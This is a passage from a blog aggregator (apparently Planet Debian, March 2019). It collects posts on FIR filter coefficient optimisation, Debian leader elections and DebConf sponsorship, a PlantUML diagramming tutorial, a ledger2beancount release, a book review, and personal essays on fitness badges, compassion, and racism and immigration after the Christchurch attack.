where the normalized frequency w goes from 0..2pi (the interesting part is from 0..pi, the rest is just aliasing), and j = sqrt(-1) so that e^jx = cos(x) + j sin(x).

Your “stability” criterion here seems to be that |F[w]| <= 1, ie., no frequency is ever boosted.

As you've no doubt discovered, the coefficients b_i need to be symmetric (b_0 = b_5, b_1 = b_4, b_2 = b_3); there's a theorem (whose name I've forgotten) that says that this is a necessary and sufficient condition for linear phase (ie., all frequencies are delayed by the same amount). This makes for a great simplification, as we can look at the real part only (the imaginary part will just be the same as the real part multiplied by a constant factor):

   |F[w]| = sum(k=0..5, cos(kw) * b_k) / cos(2.5 w)

So we want F[w] to be as close as possible to 1, without ever exceeding it. I'm sure someone will have a fancy way of optimizing it symbolically, but I chose to just sample w a bunch of times from 0..pi and formulate it as a linear program. Ie., every F[w] <= 1, the objective is sum(F[w]) over all sampled w. (I wonder if I should theoretically do abs() somewhere, but it seems not to be needed.)

This returned the coefficients

  [0.052519, -0.152582, 0.600063, 0.600063, -0.152582, 0.052519]

which I'm fairly certain are at least accurate to three decimal points; more samples may help with the lower decimals.

The six coefficients sum to almost exactly 1.0, which makes sense; more than that, and very low frequencies would pass the 1.0 limit. I have no idea why the middle coefficient is so close to decimal 0.6, though; there may be some deep reason, but I haven't seen it.

You can see frequency plots by Octave comparing your filter [first] and mine [second]:


You can see that mine is a bit better in the upper filters, trading off a little bit of ripple. I would assume they're fairly close in practice.

Some more discussion hidden deep into ryg's tweets.

26 March, 2019 08:22AM

Jonathan Carter

DPL 2019 Election: Rebuttals

Writing rebuttals is not easy. You have to scrutinise the ideas of the people you admire and highlight the flaws in the ideas that they have put a lot of thought into. At first I wanted to hold back a bit, because I don’t like being mean, but I think it may be a healthy part of the process to offer a critique towards the fellow candidates. I hope that the other candidates will understand that and not take it personally; my feelings towards them have not changed during this process.

Here are the links:

Links to other updated platforms with rebuttals can be found here: https://www.debian.org/vote/2019/vote_001

26 March, 2019 04:51AM by jonathan

Gunnar Wolf

Many random blurbs on Debian

I have been busy as hell this year. I might have grabbed a bigger bite than what I can swallow – In many fronts! Anyway, sitting at an airport, at least I have time to spew some random blurbs to The Planet and beyond!

Voting
We all feared when no candidates showed up at the first call for DPL. But things sorted out themselves as they tend to (and as we all knew that would happen ;-) ), and we have four top-notch DPL candidates. It's getting tough to sort through their platforms and their answers in the lists; the old-timers among us have the additional advantage of knowing who they are and probably having worked closely with some of them. I am still drafting my Condorcet ballot. It won't be an easy task to completely rank them!
DebConf 20 and world politics
For personal and selfish reasons, I am very, very happy to have a reason to go back to Israel after over two decades. Of course, as everybody would expect, there is a bothering level of noise that's not going to quiet down until probably late August 2020... DebConf has often taken controversial turns. Israel is not the toughest one, even if it seems so to some readers. And... Well, to those that want to complain about it — Please do understand that the DebConf Committee is not a politically-acting body. Two bid submissions were presented fully, and the Israeli one was chosen because its local team is stronger. That is probably the best, most important criteria for this conference to be successful. No, it's not like we are betraying anything — It's just the objective best bidding we got from completely volunteer teams.
DebConf 19
What are you waiting for? Register! Submit a talk! Pack up and get your ticket for Brazil!

I'd better get moving, the plane might be getting some ideas about taking off.

26 March, 2019 04:03AM by gwolf

March 25, 2019

Russ Allbery

Spring haul

I think it's becoming safe to call this spring. For once, it's a rainy, cold spring in Northern California. This is a collection of relatively random things (mostly pre-orders) that I've picked up in the last couple of months.

Elizabeth Bear — Ancestral Night (sff)
Robert Jackson Bennett — City of Stairs (sff)
Curtis C. Chen — Kangaroo Too (sff)
Maddox Hahn — The Love Song of Numo and Hammerfist (sff)
Karoliina Korhonen — Finnish Nightmares (graphic novel)
Ann Leckie — The Raven Tower (sff)
Jenn Lyons — The Ruin of Kings (sff)
Cal Newport — Digital Minimalism (nonfiction)
Noelle Stevenson — Nimona (graphic novel)
Foxfeather Zenkova, et al. — Dry Season Only (nonfiction)

I already read and reviewed Hahn's book, and have read (but not yet written the review of) The Raven Tower by Leckie.

25 March, 2019 11:51PM

Bits from Debian

Google Platinum Sponsor of DebConf19

We are very pleased to announce that Google has committed to support DebConf19 as a Platinum sponsor.

"The annual DebConf is an important part of the Debian development ecosystem and Google is delighted to return as a sponsor in support of the work of the global community of volunteers who make Debian and DebConf a reality" said Cat Allman, Program Manager in the Open Source Programs and Making & Science teams at Google.

Google is one of the largest technology companies in the world, providing a wide range of Internet-related services and products such as online advertising technologies, search, cloud computing, software, and hardware.

Google has been supporting Debian by sponsoring DebConf for more than ten years, and is also a Debian partner sponsoring parts of Salsa's continuous integration infrastructure within Google Cloud Platform.

With this additional commitment as Platinum Sponsor for DebConf19, Google contributes to make possible our annual conference, and directly supports the progress of Debian and Free Software helping to strengthen the community that continues to collaborate on Debian projects throughout the rest of the year.

Thank you very much Google, for your support of DebConf19!

Become a sponsor too!

DebConf19 is still accepting sponsors. Interested companies and organizations may contact the DebConf team through sponsors@debconf.org, and visit the DebConf19 website at https://debconf19.debconf.org.

25 March, 2019 11:30AM by Laura Arjona Reina

Petter Reinholdtsen

PlantUML for text based UML diagram modelling - nice free software

As part of my involvement with the Nikita Noark 5 core project, I have been proposing improvements to the API specification created by The National Archives of Norway and helped migrating the text from a version control system unfriendly binary format (docx) to Markdown in git. Combined with the migration to a public git repository (on github), this has made it possible for anyone to suggest improvement to the text.

The specification is filled with UML diagrams. I believe the original diagrams were modelled using Sparx Systems Enterprise Architect, and exported as EMF files for import into docx. This approach makes it very hard to track changes using a version control system. To improve the situation I have been looking for a good text based UML format with associated command line free software tools on Linux and Windows, to allow anyone to send in corrections to the UML diagrams in the specification. The tool must be text based to work with git, and command line to be able to run it automatically to generate the diagram images. Finally, it must be free software to allow anyone, even those that can not accept a non-free software license, to contribute.

I did not know much about free software UML modelling tools when I started. I have used dia and inkscape for simple modelling in the past, but neither are available on Windows, as far as I could tell. I came across a nice list of text mode uml tools, and tested out a few of the tools listed there. The PlantUML tool seemed most promising. After verifying that the package is available in Debian and finding its Java source under a GPL license on github, I set out to test if it could represent the diagrams we needed, ie the ones currently in the Noark 5 Tjenestegrensesnitt specification. I am happy to report that it could represent them, even though it has a few warts here and there.

After a few days of modelling I completed the task this weekend. A temporary link to the complete set of diagrams (original and from PlantUML) is available in the github issue discussing the need for a text based UML format, but please note I lack a sensible tool to convert EMF files to PNGs, so the "original" rendering is not as good as the original was in the published PDF.

Here is an example UML diagram, showing the core classes for keeping metadata about archived documents:

@startuml
skinparam classAttributeIconSize 0

!include media/uml-class-arkivskaper.iuml
!include media/uml-class-arkiv.iuml
!include media/uml-class-klassifikasjonssystem.iuml
!include media/uml-class-klasse.iuml
!include media/uml-class-arkivdel.iuml
!include media/uml-class-mappe.iuml
!include media/uml-class-merknad.iuml
!include media/uml-class-registrering.iuml
!include media/uml-class-basisregistrering.iuml
!include media/uml-class-dokumentbeskrivelse.iuml
!include media/uml-class-dokumentobjekt.iuml
!include media/uml-class-konvertering.iuml
!include media/uml-datatype-elektronisksignatur.iuml

Arkivstruktur.Arkivskaper "+arkivskaper 1..*" <-o "+arkiv 0..*" Arkivstruktur.Arkiv
Arkivstruktur.Arkiv o--> "+underarkiv 0..*" Arkivstruktur.Arkiv
Arkivstruktur.Arkiv "+arkiv 1" o--> "+arkivdel 0..*" Arkivstruktur.Arkivdel
Arkivstruktur.Klassifikasjonssystem "+klassifikasjonssystem [0..1]" <--o "+arkivdel 1..*" Arkivstruktur.Arkivdel
Arkivstruktur.Klassifikasjonssystem "+klassifikasjonssystem [0..1]" o--> "+klasse 0..*" Arkivstruktur.Klasse
Arkivstruktur.Arkivdel "+arkivdel 0..1" o--> "+mappe 0..*" Arkivstruktur.Mappe
Arkivstruktur.Arkivdel "+arkivdel 0..1" o--> "+registrering 0..*" Arkivstruktur.Registrering
Arkivstruktur.Klasse "+klasse 0..1" o--> "+mappe 0..*" Arkivstruktur.Mappe
Arkivstruktur.Klasse "+klasse 0..1" o--> "+registrering 0..*" Arkivstruktur.Registrering
Arkivstruktur.Mappe --> "+undermappe 0..*" Arkivstruktur.Mappe
Arkivstruktur.Mappe "+mappe 0..1" o--> "+registrering 0..*" Arkivstruktur.Registrering
Arkivstruktur.Merknad "+merknad 0..*" <--* Arkivstruktur.Mappe
Arkivstruktur.Merknad "+merknad 0..*" <--* Arkivstruktur.Dokumentbeskrivelse
Arkivstruktur.Basisregistrering -|> Arkivstruktur.Registrering
Arkivstruktur.Merknad "+merknad 0..*" <--* Arkivstruktur.Basisregistrering
Arkivstruktur.Registrering "+registrering 1..*" o--> "+dokumentbeskrivelse 0..*" Arkivstruktur.Dokumentbeskrivelse
Arkivstruktur.Dokumentbeskrivelse "+dokumentbeskrivelse 1" o-> "+dokumentobjekt 0..*" Arkivstruktur.Dokumentobjekt
Arkivstruktur.Dokumentobjekt *-> "+konvertering 0..*" Arkivstruktur.Konvertering
Arkivstruktur.ElektroniskSignatur -[hidden]-> Arkivstruktur.Dokumentobjekt
@enduml

The format is quite compact, with little redundant information. The text expresses entities and relations, and there is little layout related fluff. One can reuse content by using include files, allowing for consistent naming across several diagrams. The include files can be standalone PlantUML too. Here is the content of media/uml-class-arkivskaper.iuml:

@startuml
class Arkivstruktur.Arkivskaper  {
  +arkivskaperID : string
  +arkivskaperNavn : string
  +beskrivelse : string [0..1]
}
@enduml

This is what the complete diagram for the PlantUML notation above looks like:

A cool feature of PlantUML is that the generated PNG files include the entire original source diagram as text. The source (with include statements expanded) can be extracted using for example exiftool. Another cool feature is that parts of the entities can be hidden after inclusion. This allows using include files with all attributes listed, even for UML diagrams that should not list any attributes.

The diagram also shows some of the warts. Sometimes the layout engine places text labels on top of each other, and sometimes it places the class boxes too close to each other, not leaving room for the labels on the relationship arrows. The former can be worked around by placing extra newlines in the labels (ie "\n"). I did not do it here to be able to demonstrate the issue. I have not found a good way around the latter, so I normally try to reduce the problem by changing from vertical to horizontal links to improve the layout.

All in all, I am quite happy with PlantUML, and very impressed with how quickly its lead developer responds to questions. So far I got an answer to my questions in a few hours when I send an email. I definitely recommend looking at PlantUML if you need to make UML diagrams. Note, PlantUML can draw a lot more than class relations. Check out the documentation for a complete list. :)

As usual, if you use Bitcoin and want to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.

25 March, 2019 08:35AM

Iustin Pop

The last 10 percent

Gamification is everywhere these days, but sometimes it’s well implemented, sometimes not. In this particular case—Garmin environment—it introduced badges around a year or two ago for all kinds of things (whether real achievements or not), most of them interesting or at least funny, like having an activity while below 0°C, etc.

The other nice part of all this was that it allows you to easily compare badges with connections. Which results, err can result in races to both get the badges your connections have but you don’t, and get ones that they don’t. All this because it also has a leaderboard based on the total points accumulated—and some badges are worth way more points than basic ones.

One thing I found out this way was that some of my connections had the “achieve step goal 30 days in a row” (4 points!), or even 60 days (8 points!!!). But how can this be, since by default Garmin increases the goal as long as you hit each day’s goals? This was the reason I couldn’t get it before, as the target inexorably increases, and would reach something like 3 hours of walking needed per day at 60 days.

So, my conclusion was that this is possible only with switching to fixed-goal (N steps per day), and did so. I set myself a moderate goal (I don’t walk much, sadly, especially when I commute by bike), and started working towards it. This was back in December. And I still don’t have the badge, argh!

In the first iteration, I went all the way up to 29 days, had 40 steps left for the day, was almost celebrating, but at the end of the day completely forgot about it—because it was just 2 minutes of moving needed. 29 days of carefully checking each evening my goal, all gone away due to early sleeping during vacation… All that was between me and my goal were 40 lousy steps.

I said no problem, I’ll start again. So once more I go, all the way up to 28 days, when sadly external factors intervened and I really couldn’t hit my goal on the 28th day. At least not my fault this time, or at least partially not my fault—had I met my goal early in the day and not left it to match in the evening, I would have still gotten it.

So, on third iteration now. All went well until day 24th or so, when I got a bit of a cold. This was Wednesday last week, but still, between stuff (I got out of the house that day), it was easy to get the steps. Then, Thursday, I was really out and stayed in-house, with running nose and headache and all that stuff, when I realised: this is a “you-will-not-get-the-badge” event type!! Damn you dungeon master! I needed to move. So here I was, indoors, slowly pacing between the hot teas, for one hour, then after some sleep for another hour, until I hit my goal. Yay!

Today (Monday), I’m at 27 days out of 30. If I hit my goal today, tomorrow and Wednesday, I’ll finally have the damn badge and can both increase my target steps and start working towards the 60 day badge.

But three days is a lot. Many things could happen, including the worst case: my watch could stop working or I could lose it. And I don’t have a backup… I need to be careful…

So yeah, sometimes gamification really works :)

25 March, 2019 05:52AM

Martin Michlmayr

ledger2beancount 1.6 released

Stefano Zacchiroli and I released version 1.6 of ledger2beancount, a ledger to beancount converter.

This release contains a number of bug fixes and a new feature:

  • Add support for fixated prices and costs
  • Handle account names that contain brackets
  • Don't parse trailing tabs as part of the account name
  • Escape backslashes in the narration

You can get ledger2beancount from GitHub.

25 March, 2019 05:12AM by Martin Michlmayr

Russ Allbery

Review: The Love Song of Numo and Hammerfist

Review: The Love Song of Numo and Hammerfist, by Maddox Hahn

Publisher: Maddox Hahn
Copyright: 2018
ISBN: 1-73206-630-2
Format: Kindle
Pages: 329

Numo is a drake, a type of homunculus created by alchemy from a mandrake root. He is, to be more precise, a stoker: a slave whose purpose is to stoke the hypocaust of his owning family. Numo's life is wood and fires and the colors of flames, not running messages to the arena for his master. (That may be part of the message his master was sending.) Falling desperately in love at first sight with an infandus fighting in the arena is definitely not part of his normal job.

Hammerfist is an infandus, the other type of homunculus. They aren't made from mandrake root. They're made from humans who have been sentenced to transmogrification. Hammerfist has had a long and successful career in the arena, but she's starting to suffer from the fall, which means she's remembering that she used to be human. This leads to inevitable cognitive decline and eventually death. In Hammerfist's case, it also leads to plotting revolution against the alchemists who make homunculi and use them as slaves.

Numo is not the type to plot revolution. His slave lobe is entirely intact, which means the idea of disobeying his owners is hard to even understand. But he is desperately in love with Hammerfist (even though he doesn't understand what love is), and a revolution would make her happy, so he'll gamely give it a try.

Numo is not a very good revolutionary, but the alchemists are also not very bright, and have more enemies than just the homunculi. And Numo is remarkably persistent and stubborn once he wraps his head around an idea.

Okay, first, when I say that you need a high tolerance for body horror to enjoy this book, I am Seriously Not Kidding. I don't think I have ever read a book with a higher density of maiming, mutilation, torture, mind control, vivisection, and horrific biological experiments. I spent most of this book wincing, and more than a few parts were more graphic than I wanted to read. Hahn's style is light and bubbly and irrepressible and doesn't dwell on the horror, which helps, but if you have a strong visual imagination and body integrity violations bother you, this may not be the book for you.

That said, although this book is about horrible things, this is not a horror novel. It's a fantasy about politics and revolution, about figuring out how to go forward after horrible things happen to you, about taking dramatic steps to take control of your own life, about the courage to choose truth over a familiar lie, and about how sympathy and connection and decency may be more important than love. It's also a book full of gruesome things described in prose like this:

Her eyes were as red as bellowed embers. Her blood-spattered mane stood up a foot or more from her head and neck, cresting between her shoulders like a glorious wave of shimmering heat. Her slobbering mouth was an orangey oven of the purest fire, a font of wondrousness gaping open down to the little iron plate stamped above her pendulous bosoms.

and emotions described like this:

And he'd had enough. Numo was taut as a wire, worn as a cliff face, tired as a beermonger on the solstice. One more gust of wind and he'd snap like a shoddy laundry pole.

This is the book for simile and metaphor lovers. Hahn achieves a rhythm with off-beat metaphor and Numo's oddly-polite mental voice that I found mesmerizing and weirdly cheery.

Except for Numo and Hammerfist, nearly everyone in this book is awful, even if they don't seem so at first. (And Hammerfist is often so wrapped up in depression and self-loathing as to be kind of awful herself.) Next to the body horror, that was the aspect of this story I struggled with the most. But Numo's stubborn determination and persistent decency pulled me through, helped by the rare oasis of a supporting character I really liked. Bollix is wonderful (although I'm rather grumpy about how her story turns out). Sangja isn't exactly wonderful — he can be as awful to others as most of the people in this story — but for me he was one of the most sympathetic characters and the one I found myself rooting for.

(I'm going to be coy about Sangja's nature and role, since I think it's a spoiler, but I greatly appreciated the way Hahn portrayed Sangja in this book. He so perfectly and exactly fits the implications of his nature in this world, and the story is entirely matter-of-fact about it.)

Hahn said somewhere on-line (which I cannot now find and therefore cannot get exactly right) that part of the motivation for this story was the way the beast becomes human at the end of Beauty and the Beast stories, against all of our experience in the real world. Harm and change isn't magically undone; it's something that you still have to live with past the end of the story. This is, therefore, not a purely positive good-triumphs type of story, but I found the ending touching and oddly satisfying (although I wish the cost hadn't been so high).

I am, in general, dubious of the more extravagant claims about the power of self-publishing to bypass gatekeepers, mostly because I think traditional publishing gatekeepers do a valuable job for the reader. This book is one of the more convincing exceptions I've seen. It's a bit of a sprawling mess in places and it doesn't pull together the traditional quest line, which combined with the body horror outside the horror genre makes it hard for me to imagine a place for it in a traditional publishing line-up. But it's highly original, weirdly delightful, and so very much itself that I'm glad I read it even if I had to wince through it.

This is, to be honest, not really my thing, and I'm not sure I'd read another book just like it. But I think some people with more interest in body horror than I have will love this book, and I'm not at all unhappy I read it. If you want your devoted, odd, and angstful complex love story mixed with horrific images, gallows humor, and unexpected similes, well, there aren't a lot of books out there that meet that description. This is one. Give it a try.

Rating: 6 out of 10

25 March, 2019 02:22AM

March 24, 2019

Sam Hartman

Questioning and Finding Purpose

This is copied over from my spiritual blog. I'm nervous doing that, especially at a point when I'm more vulnerable than usual in the Debian community. Still, this is who I am, and I want to be proud of that rather than hide it. And Debian and the free software community are about far more than just the programs we write. So here goes:

The Libreplanet opening keynote had me in tears. It was a talk by Dr. Tarek Loubani. He described his work as an emergency physician in Gaza and how 3d printers and open hardware are helping save lives.


They didn't have enough stethoscopes; that was one of the critical needs. So, they imported a 3d printer, used that to print another 3d printer, and then began iterative designs of 3d-printable stethoscopes. By the time they were done, they had a device that performed as well or better than a commercially available model. What was amazing is that the residents of Gaza could print their own; this didn't introduce dependencies on some external organization. Instead, open/free hardware was used to help give people a sense of dignity, control of some part of their lives, and the ability to better save those who depended on them.


Even more basic supplies were unavailable. The lack of tourniquets caused the death of some significant fraction of casualties in the 2014 war. The same solution, 3d-printed tourniquets, had an even more dramatic result.


Dr. Loubani talked about how he felt powerless to change the world around him. He talked about how he felt like an insignificant ant.


By this point I was feeling my own sense of hopelessness and insignificance. In the face of someone saving lives like that, I felt like I was only playing at changing the world. What is helping teach love and connection when we face that level of violence? Claiming that sexual freedom is worth fighting for seems like a joke in the worst possible taste in the face of what he is doing. I felt like an imposter.


Then he went on to talk about how we are all ants, but it is the combination of all our insignificant actions that eventually change the world. He talked about how the violence he sees is an intimate act: he talked about the connection between a sniper and their victim. We die one at a time; we can work to make things better one at a time.


He never othered or judged those committing violence. Not as he talked about his fellow doctor and friend who was shot, radioed that he could not breathe, and eventually died pinned down by gunfire so that no one could rescue him. Not as he talked about how he himself was shot. Not as he helped the audience connect with grief-stricken family members facing the death of their loved ones. He never withdrew compassion.


To me I heard hope that what I try to teach can matter; it can connect. If he can face that violence and take a stand against it while still maintaining compassion, then this stuff I believe actually can work. Facing the world and making real changes without giving up compassion and empathy seems more possible: I’ve seen it done.


Somewhere in this talk, I regained a connection with my own value. People like him are helping save people. However, the violence will continue until we have the love, empathy and compassion to understand and connect with each other and find better options. In my own way I’m doing that. Every time I help someone see a different way of looking at things, I make it easier for them to start with empathy first rather than fear.


Everything I’ve written about sex is still true. That journey can bring us closer to accepting ourselves, stepping past fear and shame. Once we accept our own desires and our own need, we’re in a better position to meet in the Strength of Love and advocate for our own needs while offering compassion to others. Once we know what we can find when we have empathy and connection, we can learn to strive for it.


So I will find joy in being my own little ant. Insignificant and divine: take your pick as it’s all the same in the end.


Bringing that Round to Debian


Debian is back in the center of my compassion work. I'm running for Debian Project Leader (DPL). I served on the Debian Technical Committee for over a year, hoping to help bring understanding of diverse positions to our technical dispute resolution process. That ended up being the wrong place. Everyone seems to believe that the DPL is currently at the center of most of the work of helping people connect. I hope to fix that: more than one person should be driving that work.


After the keynote I found myself sitting between Micky Metts and Henry Poole. Micky asked me what I did that I loved. “Ah, she’s not expecting this answer,” I thought to myself as I talked about my spiritual work and how it overlaps with my Debian work. It turns out that she was delighted by the answer and we had a great time chatting about self empowerment. I’m looking forward to her keynote later today.


Then Henry asked how I was going to accomplish bringing empathy into Debian. I talked about my hopes and dreams and went through some of the specifics I’ve discussed in my platform and what I’ve had success with so far. He talked about similarities and overlaps with work his company does and how he works to teach people about free software.


Especially after that keynote it was joyful to sit between two luminaries and be able to share hopes for empathy, compassion and connection. I felt like I had found validation and energy again.

24 March, 2019 08:04PM

Shirish Agarwal

Questions about Racism, Immigration


Racial Attacks in New Zealand

I can’t believe it’s been almost a year since I wrote the blog post about Racism. While that one was in response to Russel’s post about a year back, this one is about the cowardly attack in which 50-odd, and rising, people died in the racist attack in New Zealand a few days back. I knew things were charged with Trump, and that the right and/or alt-right is rising in Europe as well, but I didn’t know that the fire had spread through Australia and New Zealand as well. And before people point fingers, it isn’t as if India is any better in the current circumstances. I came to know of the news on Twitter, where a gentleman named Khaled Beydoun broke the story. I had not been well the day before, hence after work I had just slept, and I woke mid-afternoon. I usually freshen myself up, but that day, either due to laziness or whatever, I opened Twitter and was shocked when I read the news. My eyes and brain must not have properly woken up, as I urged Khaled, along with many others, to share the stories of the victims so people might know about them. In India, it has been more or less characterised as something to celebrate, with slogans like ’50 would-be terrorists slain’ and such nonsense. I did feel it was part of some larger scheme, as I then also heard that the shooter had a webcam and live-streamed the whole thing on Facebook. Around the same time or a little later, I also came to know about Senator Fraser Anning, who talked about ‘White Australia’. The idea behind ‘White Australia’ has been mirrored by the Right in Poland today/yesterday.

Immigration

The idea is similar in many ways to what Brexiteers told to people living in Britain. In essence we see the following characteristics –

a. Immigrants are the problem of all problems – While time and again it has been shown that immigrants have been the source of growth in all developed countries, they are still able to get that particular message across. We had movies like Pathemari from the South and, fortunately or unfortunately, many more movies on the same subject pursued in Hollywood. Some of the movies which I have enjoyed and have also found challenging are Moscow on the Hudson (one of the best performances given by Robin Williams), The Immigrant, Man Push Cart, The Namesake (the novel first and then the movie), Brooklyn, Sugar and many more. To distill all the movies down, it comes to a singular fact: we love the place where we are born. We learn the taste, the smell, the culture and are assimilated by it long before we know it. It is only when people go to a different place, whether to visit or to live as an immigrant, that a dissonance is created, and people spend their whole lives trying to fix the dissonance somehow.

In fact, I know at least 10-15 friends and family personally who have been forced into being Economic migrants for life, many of them into IT or Information Technology or business. While I may have shared this pattern before, just a few months back, (without taking names), a friend of mine wound up going back to States. He had made good money in States, is and was at a high post, had made enough money to buy a bungalow in Pune. He sent resumes from United States to Indian companies in and around Pune where they promised him comparative earnings, But when he was back in the excuse of being with the family i.e. father, mother, sister et al he found that they were promising him now half or 1/3rd of what they had promised him before. And this is without any of the benefits which he was enjoying in States. His wife is also from Pune, India and a working professional. In the end, he had to sell his bungalow and say a tearful bye to his parents and sister. This is the case in almost all of Kothrud. I may have shared about Kothrud before. This is a place around 5-6 kms. from my place, where thousands of parents are living a good life as their children are abroad. They feel good that the children are earning good, but many or most of them miss the human touch, the love and care that children can give. There are now non-profits and even the police who do try to care of the old and the aged but there is only so much they can do.

Why people leave, the Brain Drain and Politics in India

Just to share some facts about the Indian Industry, the Indian Government has several plans and schemes on paper, but most of them are unworkable in real life. They have fallen flat as Startup India and ‘Make in India‘ which have been reduced to being mere logos within India. In fact, almost all economic indicators are at a record low. While except for mobiles, most electronic products are stalling, even Cars and Bikes sales which are known as bell-weathers of how the Indian Economy is doing tells the story well. In fact, the current stats. of unemployment should raise a cause of concern. The story does have political colors as now it has come to light that RBI had advised against demonetisation before it was announced and now we are fully into election mode. There is and was China-bashing without realizing we need them as we have no alternatives and even no plan. There have been accusations being made against Pandit Nehru for giving the UNSC seat without understanding the politics behind it. While I of course, need to read more of history, it does point to the fact that if Pandit Nehru had taken the seat, then India would have had war with China in 1955 rather than 1962 when it did. The reason I shared the above is at least most of the problems in India are of its own making, or at the very least, its leaders, the same I fear could possibly be said of many countries.

A hypothesis

There are a couple of other painful truths which I feel we don’t want to face: we are all migrants, if we believe and support the hypothesis and observations that anthropologists have made about Homo sapiens, as to where they were found and how migration happened over generations. By the same token, an argument can be made that all of us have bloody hands. Either recently or way back in the past, in the history we don’t know, we either wilfully or tacitly killed whatever was native to each land, whether it was humans or nature itself.

Reasoning for fear of Immigration

b. Nationalism will solve all the problems – There is this widespread belief that either ultra-nationalism, or being ultra-whatever, will solve all problems. It took more than 200 years for the separation between the church and the State, if you read the article on Wikipedia and look up some of the links they have mentioned therein, and less than 5 years with the help of technology to try to have them together. The idea of one race, one thought has been peddled before and it has resulted in untold destruction, and there is no evidence to point that it will be anything different today.

c. The main crux though of the matter though is probably Immigration and jobs, security – This is where the actual fight is. Most people believe that the natural-born should have some sort of entitlement, more than the Immigrants and that Immigrants get favors which from at least my reading has not been true at all. One point though, I am talking about Economic Migrants here and NOT migrants who end up elsewhere from where they are due to war, famine, natural calamities. For such people who are the unluckiest because they are not in charge of their fates I have no clue as it is much more complex than Economic migrants. Any solutions should have humanitarian focus but is easily pulled into politics as has been seen in India and potentially is the same for other countries as well. It is very much possible that at some future date, we may find India culpable in Rohingya genocide if that becomes the case. This reminds me very much of the Komagata Maru incident in which Indians died and the Canadian PM later apologized.

There was only one advertisement from some European freezing country (climate-wise) which said they will provide or give a house to whoever migrates there (have forgotten the name of the country) but in most countries Immigrants have quite a number of issues. Last year when trying to understand about Taiwan, came to know about immigration issues within Taiwan, much of which is espoused quite nicely in the recent issue of thediplomat. I would venture other countries would have similar issues. I had shared before when I visited Qatar and came to know that in almost all Middle-east countries Indians and people from the sub-continent have a work visa and in many ways they are bonded labourers. Only last year they have made some changes. After coming back to India, Pune I was able to ask and know from many people both in Pune and elsewhere and all of them had similar stories to share. I remember reading some article about immigration laws to Australia in which it was said that if a doctor trained in India were to migrate to Australia, he would have to go through the residency period all over again. That would add another 5-7 years for learning medicine again when s(he) could have been helping. This was shared not just in the article but also shared by personal experiences of few friends and people I met, casually had a chat and so on.

Why not Ban Immigration At all

If immigration is such an issue, why not ban it? The New Scientist ran a series of articles on the same topic a couple of years ago. While I would recommend reading them all, the one which resonated best with me was this one. I happened to meet quite a few doctors, nurses etc. during my travels, and also when I was ill in the hospital. My landlord too was a doctor who served all his life in the UK in the NHS. While we have a somewhat quarrelsome relationship, being landlord and tenant, he has shared a lot about the NHS in Britain. Interestingly, a lot of his colleagues were from India; apparently close to 30-40% of the doctors and nurses are from India. I have heard the same about Gulf countries as well. There are also articles by Rukhsana Khan; I especially liked the article in which she shares about immigration in Canada, which I found to be quite interesting. The comments much more so, as they tell how much we have yet to grow as a species.

The Positives

While the cost has been high, there has been a net positive as far as inclusiveness in New Zealand is concerned. Jacinda Ardern, the world’s youngest female leader, as shared by the Economist, has been forthright and critical, and called it a terrorist attack. This must have been really difficult for Jacinda to do politically, especially when you see her background as shared by the Economist and the reasons people chose her. But this is what leaders are expected to do: to lead and not be predictable. This is something our great leader has not been able to do. The whole world has commended her for the way she has managed to lead, with both grace and empathy. While I did see some people commenting on her need to use the hijab, most people have complimented her for the way she communicated and, furthermore, for bringing restrictions on gun ownership, esp. of automated rifles. This is something that the United States has failed to do despite so many killings which have taken place 😦

While the post has turned to be long there are still many feelings yet to be expressed, the first one is from a person of whose work I am a fan of and make no bones about it –

TL;DR: The effects of the rise of right wing populism are not dramatic and visible. Often they just involve an excruciating micronegotiation of your body and its place in geographies of suspicion. Do you know what happens when you wear skin and body of suspicion? In a country that overnight feels hostile because of an abhorrent act of terrorism, and an election that exercised the democratic will of bringing into power a fundamental extremist political party, you scan your everyday modes of being. The routines and ruts of habitual living suddenly become unfamiliar, suspect, alien. You take on the double weight of the loss and grief of the victims and the shame and repentance of the perpetrator. You inherit pity and terror of the tragedy with no catharsis. And you see yourself change. Instantaneously.

1. You find yourself smiling more. Whenever you are in public, you make an extra effort to smile at strangers, to convince them that the bag on your shoulders only has your laptop and no other weapon.

2. When you see the increased security, you try to look small, wrapped up in a shrug, to convince the scrutinizing gaze that you are not a menace.

3. When you sit on the train you realise that you sit differently. Not taking as much space, Keeping all your limbs to yourself, breathing in self-defence.

4. Your phone vibrates while you are sitting in the train. It is your mom. You wonder if you should take the call, and speak in your heathen tongue, and if it will offend or alarm people around you.

5. You hear the couple sitting next to you, peering over a train time-table and trying to figure out where they should change trains. You pause for a long moment before you give them advice in a language that you only speak brokenly.

6. You pretend not to notice the raised eyebrows when you betray your outsider status by speaking the local language clumsily, and accept the reluctant thanks before trying to hide behind your phone.

7. You are hungry. There is a lunch box in your bagpack. It is the left-over curry from dinner last night. You hesitate opening it lest the smells of your food bring forth a reaction that you might not be able to digest.

8. As you walk to the building where you have a meeting, you see a group of people drinking beer and being loud, and you instinctively scan to see if there is another entrance into the building that you can detour to.

9. You find solidarity in the people who are angry and in shock at this changed electoral and cultural trend in their country. They lament about how things are going bad. You don’t join them and instead spend all your effort in assuring them that you do not blame them, that you are happy to have them as friends and colleagues; you swallow your feeling of vague dread and spend time consoling them about the fate of things to come.

10. You meet a friend. You sit in a café and talk. You see a small group of people in their older whateveragebrackets pointedly looking at you and looking away when you catch their eye. When you see it happening more than once, you talk your friend into going somewhere else. When asked why, you say, ‘this is just so loud’.

11. You sit through an academic discussion. People are talking about vulnerability and safety. Care and creativity show up. The smart, insightful, and inspiring conversations develop, surrounded by plenty and privilege. You drone out because you remember the 5 refugees that you are counselling, who have sent you messages that given the current political climate, they want to drop out of their education development programme. Now is not a good time to be visible, one 19 year old has said.

12. You enter the central station and realise that you are going to have to sprint to the train. You are used to this. But today you walk measured footsteps even though you are going to miss the train. You don’t want to be running in your body, on a late evening train station. You miss the train and wait in the cold wind plucking at your cheeks, for the next one that takes you home.

13. On the ride back, you compose your face in rehearsed pleasantness. You wear your Asian niceness on your cheeks. The tiredness of the day has no place on your face. You are good, you are not a threat, you are acceptable.

14. You put on your headphones and are going to switch to the usual Bollywood mix that you listen to when you walk home. Before you do that, you remove the headphones and play the music. You are checking to see if the music is too loud, and seeping out of the headphones, betraying its ethnicity in its foreign cadences. You lower the volume and decide to play an American pop mix anyway.

15. You walk home on routine routes when you see three people walking behind you. It is a public space. It is your everyday route home. There are people around. You slow down to let them pass. You find comfort in the bagpack snuggling your back, like an armour.

